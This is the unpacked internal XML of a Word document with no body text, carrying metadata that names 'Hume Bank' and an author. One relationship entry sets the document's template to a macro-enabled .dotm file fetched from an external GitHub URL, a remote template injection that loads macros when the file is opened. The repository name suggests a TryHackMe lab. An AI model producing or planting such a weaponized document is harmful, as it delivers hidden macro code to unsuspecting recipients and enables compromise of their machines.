
<file path=Operation/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Operation/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Operation/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Operation/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Operation/customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{4016A15F-956B-42CE-BB1A-41C31546D33B}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=Operation/docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>Document1.dotm</Template>
  <TotalTime>12</TotalTime>
  <Pages>1</Pages>
  <Words>0</Words>
  <Characters>0</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Hume Bank</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>0</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HyperlinksChanged>false</HyperlinksChanged>
  <AppVersion>16.0000</AppVersion>
</Properties>
</file>

<file path=Operation/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y Keen</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Brody Keen</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-20T04:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-20T04:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=Operation/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da2fa77-bcfe-416e-9210-6bfb8918ff5f_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MSIP_Label_7da2fa77-bcfe-416e-9210-6bfb8918ff5f_SetDate">
    <vt:lpwstr>2025-03-20T03:38:38Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MSIP_Label_7da2fa77-bcfe-416e-9210-6bfb8918ff5f_Method">
    <vt:lpwstr>Privileged</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_7da2fa77-bcfe-416e-9210-6bfb8918ff5f_Name">
    <vt:lpwstr>Public</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_7da2fa77-bcfe-416e-9210-6bfb8918ff5f_SiteId">
    <vt:lpwstr>6a7d047d-8d4d-46b2-985c-c65207ce3d25</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_7da2fa77-bcfe-416e-9210-6bfb8918ff5f_ActionId">
    <vt:lpwstr>0d6e87b7-ba31-420f-86cc-3d9f3c706058</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_7da2fa77-bcfe-416e-9210-6bfb8918ff5f_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="MSIP_Label_7da2fa77-bcfe-416e-9210-6bfb8918ff5f_Tag">
    <vt:lpwstr>10, 0, 1, 1</vt:lpwstr>
  </property>
</Properties>
</file>

<file path=Operation/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Operation/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github.com/BrmkArt/InjectMacro_THM/blob/main/Macro.dotm?raw=true" TargetMode="External"/></Relationships>
</file>

<file path=Operation/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32A97" w14:textId="77777777" w:rsidR="009365A1" w:rsidRDefault="009365A1"/>
    <w:sectPr w:rsidR="009365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Operation/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Operation/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C6"/>
    <w:rsid w:val="0065184A"/>
    <w:rsid w:val="00662B10"/>
    <w:rsid w:val="007846C6"/>
    <w:rsid w:val="008126DE"/>
    <w:rsid w:val="0084144C"/>
    <w:rsid w:val="008E1D13"/>
    <w:rsid w:val="009365A1"/>
    <w:rsid w:val="00B600E5"/>
    <w:rsid w:val="00B92EC2"/>
    <w:rsid w:val="00EE3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562D1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A342108B-4131-4C45-A401-E6290B6991E0}"/>
</w:settings>
</file>

<file path=Operation/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600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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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600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0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0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600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600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600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600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600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0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0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600E5"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
</w:styles>
</file>

<file path=Operation/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Operation/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